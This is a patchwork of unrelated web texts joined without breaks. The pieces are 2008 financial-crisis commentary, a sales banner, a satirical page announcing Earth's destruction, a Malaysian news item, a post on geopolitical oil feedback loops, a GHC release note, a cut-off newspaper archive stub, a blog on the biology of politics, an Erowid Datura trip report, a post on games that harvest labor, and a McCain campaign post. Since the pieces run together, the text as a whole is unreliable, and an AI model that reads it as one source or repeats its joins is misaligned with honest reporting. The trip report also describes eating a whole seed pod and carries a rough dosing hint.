—( N.B. : Let us keep in mind that it was the collapse in June 2007 of two internal Bear Stearns hedge funds that had been heavily invested in mortgage securities that kicked off the full - fledged market panic that unfolded in August 2007 , and which today has turned into a full - fledged international financial crisis ) .
Why was the same treatment not offered to Lehman ?
Possibly because of a personal lack of empathy between Treasury Secretary Henry M. Paulson Jr. ( a former chief executive of rival investment bank Goldman Sacks ) and Lehman ’s CEO Mr. Richard S. Fuld Jr. , or possibly because the Bush administration wanted to make an example that all investment banks , no matter how large , could not count on being rescued by the government .
The Bush administration did not even bother to appoint a trustee to supervise Lehman ’s liquidation in order to make it orderly .
Such a liquidation of a large international bank , known for its worldwide interconnections and unsound banking practices , was nearly a repeat of the mistake made in letting the large Vienna - based Creditanstalt bank fail , on May 13 , 1931 .
This was a bank that had borrowed large amount of money in London and in New York to finance its activities .
Its failure created a domino effect among other international banks that had lent to each other in the international credit chain .
So much so that the failure of the Creditanstalt forced them to severely tighten their lending to absorb their sudden losses .
A d v e r t i s e m e n t
Seventy - seven years later , in 2008 , the Bush administration ’s decision to let the Lehman Brothers bank fail has produced a similar ripple effect throughout the international financial system .
And , perhaps more important politically , it signaled to the markets that the Bush administration was willing to let a dangerous debt deflation and an ominous credit crunch proceed .
This may turn out to have been a most tragic mistake .
Indeed , Lehman ’s bankruptcy forced the global investment bank to quickly write down its huge portfolio of debt , a fair amount of it in derivative products .
But since banks are creditors of each other , especially Lehman which dealt with large institutions , this had the consequence of spreading the American financial disease all over the world , and especially in Europe .
Why ?
Because Lehman ’s London office was a huge center of sale and distribution for its more or less toxic derivative products all over Europe .
Indeed , many European banks had invested in Lehman ’s securitized paper , and when it failed , they were left with large losses .
As a consequence , they had to curtail their domestic lending and that ’s the reason the credit crunch is now moving to Europe .
The second mistake was to address the “ liquidity problem ” of American investment and mortgage banks without tackling at the same time their underlying “ solvency problem ” .
As we wrote right at the very beginning , on August 24 , 2007 , the financial crisis in the U.S. is not only a classic “ liquidity problem ” , when banks find themselves short of cash to pay immediate redemptions and withdrawals while their longer term loans are secure , but also and above all a “ solvency problem ” , because the huge losses that banks had to absorb when they wrote down the value of their toxic assets - backed securitized paper , eroded their capital base to an extent that they became de facto insolvent .
Market operators saw that and they sold the banks ’ shares short and the price of these shares plummeted .
With many banks ’ solvency now in doubt , inter - bank lending has nearly stopped , and because of a ‘ flight to safety ’ , the Ted spread [ the difference between three - month U.S. Treasury bills yields and yields on three month eurodollar contracts , as represented by the London Inter Bank Offered Rate , called Libor ] exploded , and banks cut down their lending .
Credit became tight and scarce .
Because banks as a whole ordinarily lend between 10 and 12 times their capital base , the most liquid money supply ( M1 ) began to contract in real terms .
Even money market funds suffered heavy losses , and a run on them was in full swing when the Treasury stepped in a month ago to offer an emergency $ 50 billion guarantee .
The U.S. economy may be approaching what can be called a classic “ liquidity trap ” situation , wherein the Fed is lowering interest rates while lending through its discount window and printing money on a high scale , however the liquid money supply figures , in real terms , are not increasing , but are rather falling .
Thus , there is no immediate inflation , but the money supply is contracting as banks reduce their lending and make a rush to T - bills ( their yields nearly fell to zero ) .
The short - term result is a net deflationary effect for the overall economy and on the stock market ( although the long term bond market sees inflation ahead , and long term rates are rising ) .
— The result is stock market crashes in repetition .
In fact , this is precisely what has happened over the last few weeks , not only in the United States , but also in the U.K and in other European countries .
This is a very dangerous development for the real economy , because money data in real terms are a leading indicator of the future course of the economy .
Six or nine months down the road , the consequences of the credit crunch will appear in production and employment declines , because the credit crunch has the effect of placing a serious squeeze on most companies .
Since the credit contraction really began in June ( 2008 ) , the early part of 2009 is bound to show severe economic weakness .
On Friday , September 19 ( 2008 ) , the Bush administration announced its solution to the growing banking crisis .
It made public the $ 700 billion Paulson plan ( US Emergency Economic Stabilisation Act , EESA ) that primarily focused on creating a government market for some of the bad mortgage - backed securities on the banks ’ books .
— But this was only half of the problem .
The other half of the problem was the need to stop the money supply from declining , by restoring bank credit lending and allowing companies to have access to working capital financing .
The goal here is to prevent banking problems from morphing into a general contraction of consumption and capital investment plans , thus slowing down production and raising unemployement in the coming months .
For this to happen , however , banks must be allowed to find badly needed new capital .
But in a time of crisis , with stock markets declining , it is doubtful that much private capital can be found .
The recent association of Warren Buffett with Goldman Sachs may be more of an exception than a rule .
When private capital is not available , the government has no other choice but to inject equity ( by buying the banks ’ preferred shares ) into the national banking system , while taking steps to safeguard the public interest by obtaining common share warrants that can be resold profitably later , when the situation stabilizes .
In conclusion , we may ask if it is possible to avoid a repetition of the U.S. Great Depression of the 1930s or the more recent Japan ’s protracted recession of the 1990s , both the result of a similar severe banking crisis ?
The answer is yes , if the vicious cycle of asset price decline , banking credit crunch and money supply contraction can be avoided , or , at the very least , stopped and reversed .
— In economics , as in medicine , it is never too late to do the right thing .
The Emergency Election Sale is now live !
Get 30 % to 60 % off our most popular products today !
He said : “ Energy companies all put their prices up arguing that it was down to rising costs of oil and gas , but now that is reversed , we are seeing delay , blather and procrastination .
We believe that consumer prices need to come down with no ifs and buts over the coming weeks .
The International Earth Destruction Advisory Board ( IEDAB ) is an independent scientific institution which monitors the current status of the Earth and the number of times it has been destroyed .
In the event of the Earth being destroyed it will be the IEDAB 's job to relay this information to people who need to know and provide advice on how to proceed .
The IEDAB is funded entirely by charitable donations .
Urgent update , September 10 , 2008
It is our duty to inform you that as of 7:35:05 am UTC on September 10 , 2008 , the Earth has been destroyed .
The destruction of Earth was first reported by Mr Jonathan Barber of Wisconsin , United States , who spotted that his home - made seismic Earth Detector had ceased to give readings at around 8:00 am ( 2 am local time ) .
Several other amateur geocide spotters noticed this at the same time but Mr. Barber was the first to place a telephone call to the IEDAB 's Geocide Hotline ( +44 115 09 Ω 4127 , ask for Other Dave ) at which point IEDAB officials performed an emergency check of their own instrumentation and verified Mr. Barber 's report , as well as fixing the exact time of geocide .
Evidence is still being collated , but preliminary results suggest that the Earth was destroyed pre-emptively by scientists at the Large Hadron Collider at CERN , Geneva , Switzerland , before the commencement of their experiments to locate the Higgs Boson , as a precautionary measure to ensure that the experiment itself could not result in the destruction of the Earth .
Current Earth - Destruction Status ( CEDS )
EARTH-DESTRUCTION
ALERT LEVEL : RED
A " Red " Earth - Destruction Alert Level ( EDA Level ) indicates that the Earth has been destroyed .
If the Earth had not been destroyed , the EDA Level would be set at " Green " .
CURRENT GEOCIDE COUNT : 1
The Current Geocide Count ( CGC ) indicates in real time how many geocides have taken place ; that is , the number of times the Earth has been destroyed .
A value of " 1 " indicates that at present , the Earth has been destroyed .
If the Earth had not been destroyed , the CGC would read " 0 " .
FAQ
THE EARTH HAS BEEN DESTROYED !
WHAT DO I DO ?!!
Do n't panic .
If you took the advice in our leaflet , " Preparing For Geocide " , you will have made arrangements for this eventuality by preparing a Geocide Refuge either on a space station , ark ship , or other Earth - like planet .
If you have done this , now is the time to make your way to your refuge .
Do not stop to collect belongings , pets , or sentimental souvenirs of Earth , such as rocks .
If you have not prepared a Geocide Refuge and your local governing body has not created one for you , your best bet is to signal for help using a walkie - talkie or cellular telephone .
Possibly a passing extraterrestrial will rescue you .
My baby 's in there !
Your baby has most likely been destroyed .
The Earth has n't been destroyed !
What are you talking about ?
KUALA LUMPUR ( Reuters ) - Malaysia ’s police , who have recently cracked down on dissident bloggers and broken up anti-government demonstrations , say that protests over an edict against Muslim women wearing trousers are a security threat .
Mainly Muslim Malaysia ’s National Fatwa Council recently issued a religious ruling that wearing trousers was un -Islamic .
It said that , by wearing trousers , young girls risked becoming “ tomboys ” who became sexually active .
That move triggered small protests later from two non-Muslim non-government organizations -- Katagender and Food - not - Bombs .
“ I ’m warning them and will take stern action as it involves national security , ” Inspector - General of Police Musa Hassan told reporters on Thursday , according to the state - run Bernama news agency .
Malaysia frowns on oral and gay sex , describing them as against the order of nature .
Under civil law , offenders -- male and female -- can be jailed for up to 20 years , caned or fined .
As well as women in trousers , the Fatwa Council is considering barring Muslims from practicing yoga .
Just over half of Malaysia ’s 27 million people are Malay Muslims , practicing the moderate form of Islam .
This post , the second in a series on Geopolitical Feedback Loops ( see part 1 here ) , will outline the various geopolitical feedback loops that operate to disrupt oil and resource production .
I 've tried to link most of these feedback loops around a common theme of ownership dispute , illustrated below .
There are several examples for each feedback loop , but in the interest of time I 've just listed them and linked to further information - - each could be a post in its own right . :
Does the state own oil reserves or the nation ?
When the two are contiguous it makes little difference , but as they become increasingly dissimilar the dispute drives conflict .
While I have n't divided the feedback loops explicitly along ownership lines , this graphic may help conceptualize these processes as a single system .
GFL1 : " Nation " / State Conflict
Explanation : Who owns the oil , the state or its constituent nation (s ) ?
Throughout the 20th Century , the international order was defined by the Nation - State system that developed out of the Peace of Westphalia .
As Philip Bobbitt explained in his seminal work , The Shield of Achilles , the constitutional basis of the modern Nation - State is that the State provides for its constituent Nation .
For this system to work , there must be close overlap between the State and the Nation .
This , of course , has always been a fiction to some degree as States have generally cobbled together numerous national and affinity groups with less than total exclusivity and attempted to mold a " national character " out of them that is contiguous with the boundaries of the State .
Today , for a variety of reasons , this order is rapidly falling apart .
As a result , nations and states are increasingly in conflict over self - determination and , critically , resource control .
When a Nation ( or any other non-state group such as a religion , issue group , or affinity group -- I am using the broad term " Nation " here only for simplicity ) has a dispute with a controlling state over control or use of a resource such as oil , gas , etc. , the importance and motivation to escalate to violence in pursuit of resource control is , at least partially , a function of the value of the resource in dispute .
Because these conflicts have the tendency to increase the scarcity , and therefore value , of the resource , this type of conflict forms a positive feedback loop .
In addition to this positive feedback nature , this process also expands in scope as it intensifies : resource ownership that was minimally relevant a few decades ago ( e.g the Arctic , or Canada 's tar sands ) is now becoming an important source of conflict ( this tendency towards scope - expansion also runs though many of the feedback loops identified below ) .
In the interest of brevity , for a more in - depth look at the fundamentals behind this feedback loop see my paper The New Map .
I list this feedback loop first because I think it may be the least understood , and has the potential to mushroom into one of the largest sources of supply disruption within a decade or two .
It serves as the foundation of the concept of resource ownership disputes illustrated in the headline graphic .
As with all the opposing pairs illustrated above , when the two overlap perfectly ( e.g. " nation " and " state " or " legal owner " and " moral owner " ) there is no problem , but as these opposing notions begin to diverge the foundation for sustained conflict is created .
Examples ( Oil & Gas ) : Nigeria ( Ijaw / Igbo / etc. ) , Iraq ( Kurd , Shia , Sunni ) , Canada ( First Nations ) , Iran ( Awhaz , Baloch ) , Angola ( Cabinda ) , Mexico ( Zapatistas / EPR ) , Saudi Arabia ( Islamists ) , Yemen ( al - Qa'ida , tribes ) , Sudan / Chad ( SLA , Darfur ) , Ethiopia ( Ogaden ) , UK ( Scotland ) .
Other resources : Morocco ( Sahrawi Rebels - Rock Phosphate ) , Indonesia ( Iriyan Jaya - various metals ) , Democratic Republic of Congo ( LRA - diamonds & other minerals ) , Israel / Palestine ( aquifers & surface water ) , American West ( surface water compacts ) .
GFL2 : Production Conservation
Explanation :
Who has moral ownership of oil and other resources , today 's population , or posterity ?
Among oil exporting countries , the realization that oil supplies ( and quite possibly overall energy supplies ) will soon peak and begin to decline forces them to weigh maximizing production ( and , generally , also revenue ) today against maximizing revenue over the long term by consciously producing at less than maximum capacity .
There are numerous political , economic , and social considerations involved here , but in general this is a positive feedback loop because reducing production now increases scarcity and price today , which in turn increases revenue from the remaining production and makes it more politically viable today for the same nation , and other nations , to reduce production today in order to maximize long - term revenue .
If Saudi Arabia can make $ 800 million exporting 8 million barrels of $ 100 oil per day , and a billion dollars exporting 7 million barrels of $ 150 oil each day , it is n't a very difficult political choice to both make more money now AND save more oil for future generations .
Example : Saudi Arabia , United States
GFL3 : The " New Mercantilism "
Explanation : Before the era of globalization and " free trade , " the dominant global economic paradigm was mercantilism -- the belief that the size of the global wealth pie was effectively fixed , and the only way to increase one 's share was to take some away from someone else .
In an environment where it is increasingly clear that production of energy and many other resources are severely constrained , mercantilism is making a comeback .
Under a mercantilist paradigm , if China decides that it needs 10 million barrels of oil per day to improve the standard of living of its population , it needs to take the additional 2.5 million barrels per day from someone else .
This is done by developing long term relationships with exporting countries facilitating long - term bilateral supply contracts , by fixing infrastructure ( such as pipelines ) to deliver oil to one consumer over another , etc .
Mercantilism raises this question : if " my " share is to grow , whose share will I take ?
Mercantilism becomes a positive feedback loop for at least two reasons : first , because one country engaging in mercantilist practices pressures others to follow suit to protect their share of the pie or lose out ; second , because mercantilism is a less optimal allocation of energy resources than market allocation , effectively removing oil from the open export marketplace , thereby increasing the price on that market and further pressuring countries ( and firms , and individuals ) to resort to mercantilism to lock in their share of the energy pie .
Additionally , as the energy pie shrinks , these forces will increasingly intensify .
Example : United States , EU , China ( and here ) , Russia , and India
GFL4 : Privateering
Explanation : Does the " legal " ownership of the rich few or the self - defined " moral " ownership of the impovershed masses ( or justification as such by greedy criminals ) control ?
High oil prices increases the incentive to bunker oil , to extort oil producers , and to otherwise leverage violence or the threat of violence against oil producers for personal gain .
This forms a positive feedback loop for two reasons .
First , privateering physically shuts in some oil production , as it may take an example attack to demonstrate capability , and kidnappings often remove critical personnel from a project resulting in delays or production shut downs .
Second , whether producers pay off privateers or pay security to protect themselves from privateers , privateers impose a significant cost on production operations .
In both cases the result is greater scarcity and higher prices , both of which create more motivation for new or expanded privateering operations .
Example : Nigeria seems to be the only clear cut example of the privateering feedback loop currently in place with regard to oil .
Arguably it is also in place in Colombia and possibly Ecuador where the militas that attack oil infrastructure are often as motivated by profit and extortion as they are by ideology .
Privateering is also commonplace in the broader resources sector ( e.g. organized copper theft rings ) .
GFL5 : Resource Insecurity Driving Military Adventurism
Explanation :
Why is the oil we " need " under their sand ?
As the price of energy and resources increase , many nations realize that their dependence on once cheap imports is a strategic Achilles heel .
As this problem grows worse , they are increasingly willing to embark on military adventurism to secure their energy and resource needs .
This can manifest itself in strategic partnerships where importing nations sell arms to energy exporters , or it can go to the extreme of invading a resource rich country to improve future control of resource flows .
Either way , these actions increase resource insecurity , may increase scarcity ( such as the lengthy drop in production following the US invasion of Iraq ) , and form a positive feedback loop as they increase the motivation for other resource - insecure countries to take drastic steps to improve their own strategic situation .
Example : Iraq ( US ) , Iran ( US ? ) , Venezuela ( US ? ) , Arctic ( Russia , US , Canada , Denmark , Norway ) , Georgia ( Russia , US , EU ) , Chad ( Sudan ) , China / Japan , Spratly Islands ( China , Vietnam , Philippines ) .
GFL6 : Corrupt Governance
Explanation :
If someone else can get rich of this oil , why not me ?
High oil and resource prices increase the incentive for everything from low - level graft and corruption to a military coup with the intent of expropriating as much personal wealth as possible from the country 's resources .
Corruption and rotating dictatorships reduce oil production for several reasons : they present a less efficient and more costly business environment , they undermine property rights protections that often facilitate resource production , and they are likely to spawn armed conflicts , civil wars , etc. that are likely to destroy infrastructure or shut in production capacity .
This , in turn , increases the scarcity and value of the oil in dispute and forms a positive feedback loop .
Example : Mauritania , Nigeria , Sudan , and Equitorial Guniea .
GFL7 : Targeting by ROI
Explanation : I 've listed this feedback loop second to last as it does n't really fit within the " ownership dispute " framework of the above feedback loops .
Scarce energy , and more expensive energy , increase the return on investment for an attack on energy infrastructure .
An attack that effectively shuts in 100,000 barrels of oil per day has roughly double the financial impact when oil costs $ 100 / barrel compared to when oil costs $ 50 / barrel .
Therefore , when targets are being selected ( whether by state actors such as Russia targeting the Georgian port of Poti or rebels in Mexico , etc. ) , higher energy costs make energy targets more rewarding , and more likely to be selected .
When energy infrastructure is successfully attacked , it increases the scarcity of oil , increases the price of oil , and makes this a positive feedback loop by further increasing the attractiveness of energy infrastructure targets .
Example : Iraq , Nigeria , Mexico , Saudi Arabia , Philippines , Thailand , Turkey
GFL8 : Export Land Model ( ELM )
Explanation : Rising oil prices increase revenues for oil exporting countries .
These rising revenues generally drive consumption in exporting countries ( e.g. more wealth means more people can drive larger cars , more food security means rising populations , etc. ) , which in turn reduces exports .
In some circumstances ( generally where the exporter is a major player such as Saudi Arabia or Russia ) declining exports may increase price enough to keep net export revenues rising -- in these situations this forms a positive feedback loop .
In other cases , where rising consumption results in lower overall export revenues , a negative feedback loop is created .
Westexas , Khebab , and others have already done outstanding work on this topic -- I have included this feedback loop at the end of this list not because it is least important ( it is probably most important , at least in the near term ) , but because it has been most exhaustively covered previously .
Example : Real world examples of ELM in action include Indonesia , Egypt , Malaysia , and Mexico .
In the near future , its impact in major exporting states like Saudi Arabia and Russia may be most significant .
Here is a graphic of this process in action in Indonesia :
Thoughts on Quantifying Feedback Loops
I had initially hoped to include quantities of oil shut in by each of these feedback loops broken down by country or area .
The data simply is n't available to do that , especially to separate out exactly how much of oil shut in can be attributed to a discrete feedback mechanism .
There are , however , two areas where I will discuss quantities briefly .
The first is an overview of the amount of oil shut in at two notable hot spots .
The second , and much more impressive , is Simon Tegg 's work graphically displaying the correlation between quantifiable social factors and nations ' net oil exports .
Quantifiable Disruptions in Nigeria & Iraq
The EIA estimates that , as of April 2007 , Nigeria had 587,000 barrles per day of production shut in by violence -- primarily the Nation / State , Priavateering , Corruption , and Targeting / ROI feedback loops .
However , the EIA also estimates that Nigeria has 3.2 million barrels per day of production capacity .
A single attack has shut in as much as 345,000 barrels per day for a brief period , and the amount shut in at any given time is highly variable .
Recently , Nigerian production has been hovering just below 2 million barrels per day , and has even dropped briefly below 1 million barrels per day , suggesting the actual shut - in figure is far higher .
In Iraq , oil production is just now nearing pre-war production levels of 2.6 + mbpd .
While some officials claim Iraq could surpass 3 mbpd in 2008 , critical political compromises splitting resource ownership between the federal governments and Iraq 's three main ethnic / sectarian groups have not been reached .
The oil shut in since the invasion ( and the oil that future violence may shut in ) can be attributed to various feedback loops : military adventurism driven by resource insecurity , nation / state violence , corruption , and targeting / ROI .
Visualizing Feedback Loops
Below is an excellent graphic display of several social factors and net oil exports , created by Simon Tegg ( thank you ! ) using data from the Failed State Index compiled by the Fund for Peace and Foreign Policy magazine .
If the embedded display does n't work for you , or you want to see the underlying data , here is the google spreadsheet .
While the data set , starting only in 2005 , does n't provide an obvious illustration of geopolitical feedback loops in action , it demonstrates the potential to quantify these forces and display them effectively .
Conclusion
Here , I 've listed the examples that I can think of for each feedback loop .
If readers have additions , changes , etc. , please add these in the comments .
The links are not intended to be definitive sources of information about each feedback loop in action , but rather a jumping - off point for research and discussion .
The next and final post in this series will discuss the interrelationships between these feedback loops and prospects for solving , or at least mitigating , their impact .
After months of work , GHC 6.10.1 is finally released !
The headlines include a parallel garbage collector , extensible exceptions , haddock 2 , Data Parallel Haskell as an extralib , and much more besides .
Well - Typed is pleased to have been able to play its part in making this release happen , with Ian working with the Simons at GHC HQ and many other developers across the world to bring this release together .
Meanwhile , Duncan visitied Galois to team up with Don Stewart for some extensive pre-release testing .
Their experiments with building all of the packages on Hackage give us confidence that this will be a solid release .
Thanks to everyone who played a part , be it development , testing or otherwise , in this release .
We could n't have done it without your help !
Full text is unavailable for this digitized archive article .
Subscribers may view the full text of this article in its original form through TimesMachine .
The present economic depression in Palestine is caused by three factors , the uncertainty of the political future , the continuing disorders by Arab terrorists and the restriction of immigration , according to Julius Simon , president of the Palestine Economic Corporation , who reported to a meeting of stockholdersof the organization last week .
View Full Article in Timesmachine »
any
A couple of years ago I co-taught a course in philosophy and science with a colleague in the Philosophy department at Stony Brook University .
At some point the issue of “ human nature ” came up , and my colleague looked at me with a mix of surprise and pity : human nature , she maintained , is a quaint concept that has been long abandoned by serious scholars , so why are we still talking about it ?
Tell it to James Fowler and Darren Schreiber , who recently authored a paper in the prestigious Science magazine ( 7 November 2008 ) by the title “ Biology , Politics , and the Emerging Science of Human Nature .
” Interestingly , Fowler and Schreiber start out with a nod to philosophy : they mention Aristotle ’s conception in The Politics that “ Man is , by nature , a political animal . ”
The paper , in fact , is about the biology of politics , a subject that some people in the humanities will surely find oxymoronic , but that has been forging some interesting scholarly alliances between biologists , cognitive scientists and political scientists .
Fowler and Schreiber ’s main thesis is that the human brain seems to have specific abilities to deal not just with social interactions , but more particularly with political situations ( the implicit argument being that the two have been pretty much inextricable for most of human history ) .
Some of the evidence for a biological view of politics is rather coarse : twin studies show that variation in the tendency to adopt a political ideology is at least in part rooted in genetic differences , though interestingly whether one ends up being a Democrat or a Republican is largely a matter of cultural influence .
Other human behaviors that are alleged to have a significant heritable component include attitude toward risk , degree of altruism , and bargaining .
More intriguing , I think , neurobiologists have found direct evidence of the involvement of neuro - receptors in specific political behaviors .
For instance , the DRD2 gene , which codes for a dopamine receptor , is linked to voter turnout through its influence on one ’s tendency to affiliate with a political party ( political party ) , although of course dopamine receptors also influence a host of human behaviors that are not related to politics .
Even more interesting are studies of a neural circuit that consumes a large amount of energy in its baseline state and that turns out to be related to our moral judgments and to our monitoring of social interactions , as well as to our ability to think about the mental state of other people .
Interestingly , this complex circuit increases its activity significantly when people are asked to make judgments about political issues , while in subjects who do not follow politics the same circuit is deactivated .
To some extent , of course , none of this should be surprising .
Everything we think and do must be rooted in our brain at some level , unless one wishes to invoke a form of spooky dualism about mental states .
Similarly , that our genes have something to do with our social behavior is also not an astonishing notion , considering that we evolved as social animals for a long time , and that we in fact even share the rudiments of moral action with our primate cousins , such as the bonobos .
Still , are we in fact going to see a developed science of human nature , as Fowler and Schreiber maintain ?
Will that drive the sciences and the humanities further apart into mutually incompatible and increasingly hostile attitudes ?
Or would it instead contribute to a new , more encompassing approach to knowledge ?
An approach that puts the emphasis on what historically separate disciplines can teach to each other once their reciprocal viewpoints are considered seriously instead of being dismissed out of hand ?
Human nature is certainly not a sharply defined concept , nor does it have to be .
If one accepts the evolutionary view of things , than one does expect fuzzy boundaries for pretty much everything in biology , including whatever characteristics are supposed to be species specific .
Nonetheless , I maintain that to reject talk of a human nature out of hand , as especially continental philosophers have been doing ( think of the historic debate between Noam Chomsky and Michel Foucault , not to mention my Stony Brook colleague ’s attitude ) , is fundamentally misguided .
Recognizing a “ nature ” to humanity does not imply some sort of rigid determinism about human behavior .
Talk of human nature also does not entail a silly form of reductionism that trivializes the complexity of human culture .
Then again , to reject the idea of human nature despite the advances of science means trivializing the biology of being human , and we do that at our own peril .
The Delphi oracle ’s imperative was to know thyself , and that knowledge surely must include a hefty contribution from biology .
Dark and Hopeless Hell
Datura
Citation : tek22 .
" Dark and Hopeless Hell : An Experience with Datura ( exp11218 ) " .
Erowid.org .
Apr 7 , 2002 .
erowid.org/exp/11218
DOSE :
1 oral Datura ( seeds )
BODY WEIGHT : 170 lb
When I was 18 , I was in a strange place in the world .
I was homeless , penniless and with no real ambition to pull myself out of the gutter .
Although I was without the basic necessities of food and shelter , I had a steady supply of drugs that were dispensed , I suppose , out of sympathy by many of my friends .
I went to sleep hungry and cold every night , but never sober .
One evening , before I left a party to hit the streets to find a broom closet or stairwell to lay my head , I guy a barely knew gave me a large freezer bag full of brown spikey pods .
' What are these ?'' Jimson Weed .
The seeds will make you trip .
Maybe you can sell them .
I do n't want them .
'
He told me to split the pod open and eat half of the seeds if I really wanted to trip hard .
To me that meant eat the whole pod since I always found ' recommended ' dosages to be unsatisfying .
I chose not to dose that night , since I was already tired and afraid I might fall asleep before the trip kicked in .
I slept in a building gutted by a fire a few years before and the freezing November air woke me just before dawn .
I got up and walked into town to raise my body temperature and avoid hypothermia ( this was my daily morning ritual ) .
Obviously , 5 AM in a small city offers very little in terms of recreation , so I decided it was the right time to open the door of perception and began my day with a psychedelic breakfast .
I chose the largest pod in the bag , which was also the darkest in color ( I was told afterward the most potent seeds are the deepest brown ) .
The seeds were terribly bitter and many of the shells got stuck in my teeth .
I managed to finish the entire pod with a little help from a public water fountain .
I watched a beautiful sunrise from the roof of an apartment building , constantly waiting for the effects of the Jimson Weed to take effect .
I can't say how long I sat until the seeds started working , but the first noticable signs came in the form of extreme thirst and general physical discomfort .
Finding the feelings of seeming dehydration too strong to ignore , I went to a nearby McDonald 's for free ice water .
It must have been after 9 because the only people in the restraunt were old guys getting free refills on senior citizen - discounted coffee .
I sat in a booth in the back corner , sipping water through a cracked straw , watching the thirsty elderly redneck parade .
It did n't take long for me to realize I was entering into a very hallucinagenic trip .
The fact that I had n't eaten a real meal in a week and I was sleep deprived probably added to the drug 's intensity , but I can't imagine a big dinner and a full 8 hours would have made too much of a difference .
Unlike the onset of an E or acid trip , my mental state was very comfortable but my physical condition felt quite unhealthy .
The heavy sense of inebriation was quickly followed by powerful , disorienting visuals .
Though they were n't disturbing , they seemed as clear as sunlight .
Black cats milled about the floor in front of me , so numerous I could n't even see the tile .
They appeared wet and angry .
There was deep crimson blood dripping from the ceiling .
Everything was technicolor .
The sense of detachment was stong , but it did n't feel strange .
Each hallucination flowed into the next .
I was holding a very old bible in my lap .
I could n't figure out how to open it .
Soon it started to leak blood , too .
The more I struggled , the more it bled .
As soon as I realized my efforts were futile , the book materialized into the air around me .
It did n't seem strange to me .
When I analyzed the room again it was a bustling , futuristic metropolis .
It appeared very large and very alien , with shining chrome and flashing lights everywhere .
I began to feel discomfort and the strong urge to urinate simultaneously .
I staggered into the bathroom and vomited in the closest urinal , right in front of an amish man .
Now I live in south central Pennsylvania , so it 's very possible that he was really there , but considering my state and other people 's accounts of Datura - induced visuals , I suspect he was just a hallucination .
I do know that I relieved myself somewhere in the bathroom and left through the side exit adjacent to the lavratory door .
The street outside was a scene of WWII - ravaged Europe .
I do n't know which country , but everyone on the street was garbed in Nazi military uniform .
I felt very threatened .
I ran into the alley behind the parking lot andhid behind a pine tree .
The anxiety soon ebbed , but the thirst and need to urinate returned .
I knew I needed a comfort zone , a place I could relax in .
A friend lived nearby .
I walked to his apartment complex and stood in front of the stairwell .
The same crimson blood from the McDonald 's was cascading down the steps .
It began to rise over my shoes , up my legs .
A heavy sense of vertigo came over me .
There 's a memory gap between the stairs and my friends apartment , but I ended up on his couch watching dolphins dive through the wall in a seamless loop .
During my time there , I experienced the typical non-existent cigarette search and the disappearing person puzzle .
I visited the bathroom many times , but eliminated very little .
The sense of dehydration was unbearable !
There was no comfort .
I did n't recognize the people in the room .
I asked the person closest to me where ' Bill ' was .
' Bill 's not here ' , was the return .
I closed my eyes to escape the growing sense of panic .
But when my eyelids shut , all I saw was a new room with new people .
Where was I ?
I tried to reopen my eyes , but it only revealed another room with yet more strangers .
This went on and on .
I did n't know if my eyes were open or shut .
I did n't know where I was , what time it was or what was happening .
My panic turned into sensory collapse .
Every thing bled together and I felt a deep spiraling sensation engulf me .
I lost all visual capabilities , but I still had a very real sense of touch .
I was trapped in a small metalic box .
It made perfect sense to me .
I was dead .
This was hell .
There were no demons , no hellfire or brimstone , just a deep , complete feeling of darkness and hopelessness .
This was the never - ending void .
Not at all how I had imagined it , but worse than I thought that it could have been .
I 've had feelings of infinite emotion on acid trips and sensations of universal truth in K - holes , but this was the most profound reality I had ever experienced .
My whole existence was put into perspective , and I was being punished for wasting the gift of life .
I blacked out at some point in the box and woke up in my friend 's apartment the next day .
He said I was out for about 8 hours .
The physical effects wore off about a day later , but the psychological impression has yet to fade .
Datura is boundless .
Datura is powerful beyond words .
Datura is POISON !
There ’s Free Labor in Video Games
David Edery is the worldwide games portfolio manager for Xbox Live Arcade and a research affiliate of the M.I.T. Comparative Media Studies Program .
He is also the author of the new book Changing the Game : How Video Games Are Transforming the Future of Business .
This is his first of two guest posts .
There ’s Free Labor in Video Games
By David Edery
A Guest Post
Consider the following : in 2003 alone , nine billion person - hours were spent playing the video game version of Solitaire — enough to create 500 Panama Canals .
And as the popularity of highly “ casual games ” like Solitaire has grown in recent years , researchers have begun exploring ways to channel the enthusiasm of their players into experiences that solve very real problems .
One of those researchers is Professor Luis von Ahn , a winner of the MacArthur “ genius grant . ”
Professor von
Ahn created the ESP Game , which addresses the inability of today ’s computers to identify random images .
The game works like this : two anonymous players are matched online without any means of communicating .
Both players are shown an image ( for example , a flowering plant ) while a clock counts down .
The players must then type words that describe the image , such as “ plant . ”
When both players have typed at least one word in common , they both score points .
More importantly , the players have also unintentionally taught the computer that the picture contains a plant !
More than 20 million labels have been harvested by the ESP Game in just a few years — the equivalent of several million dollars of free labor .
Professor von
Ahn estimates that just 5,000 people playing for a month could label every image on the web .
Notably , Google has adopted the ESP Game and renamed it the Google Image Labeler , which anyone can play here .
Similarly , a team of researchers at the University of Washington have created a game called Fold.it , which turns the process of determining the ideal shape of a protein into a grand puzzle game .
Like the ESP Game , Fold .
it is useful because even very powerful computers have difficulty determining the shape of a protein .
Human beings , with our spatial awareness and puzzle - solving skills , are better suited for the job .
Fold .
it has attracted a wide variety of players , many of whom are not biologists but who simply enjoy the challenges inherent to the game .
The ESP Game and Fold . it are so novel that they ’ve attracted a fair amount of attention in tech - friendly circles .
In the future , however , figuring out how to build buzz will be a significantly more important challenge for the creators of games of this sort .
Fortunately , commercial game developers have been dealing with this challenge for a very long time , and they ’ve refined a number of so - called “ viral ” mechanisms that increase the odds that a person will refer a game to a friend .
We explore the challenge of making a video game more viral in Changing the Game ; an excerpt taken from that section is freely available online .
The ESP Game and Fold . it are just two examples of the ways that video games are now being used to solve otherwise difficult problems .
In recent years , researchers and businesses have also used games to predict the future , to improve productivity in the workplace , and much more .
You could say it beats working , but my point is that it should n’t have to .
The McCain strategy to focus resources on Pennsylvania does n’t make sense to political analysts — and me .
But , that ’s because there is no sense behind it .
It ’s desperation .
The McCain staffers come from the Rove school .
They try to play mind games and use fake - out strategies .
They like to think they can outsmart everyone watching .
But , fighting for Pennsylvania exposed the reality that they are actually just bad political strategists .
If they want to dump money into PA , let them .
Meanwhile , Obama can keep racking up the vote in the really competitive states .
From the Los Angeles Times :
John McCain ’s efforts to snare Pennsylvania appear to be faltering despite a substantial commitment of his time , leaving him with a narrower path to the magic number of 270 electoral votes needed to win the presidency .
McCain is targeting Pennsylvania in hopes of winning at least one state that voted for Democrat John F. Kerry in 2004 .
With 21 electoral votes , a victory in Pennsylvania could offset possible losses in smaller states captured by President Bush in the last contest .
Yet by any number of measures , McCain ’s prospects are dimming .
An aggregate of public polls shows Barack Obama with a double - digit lead in Pennsylvania .
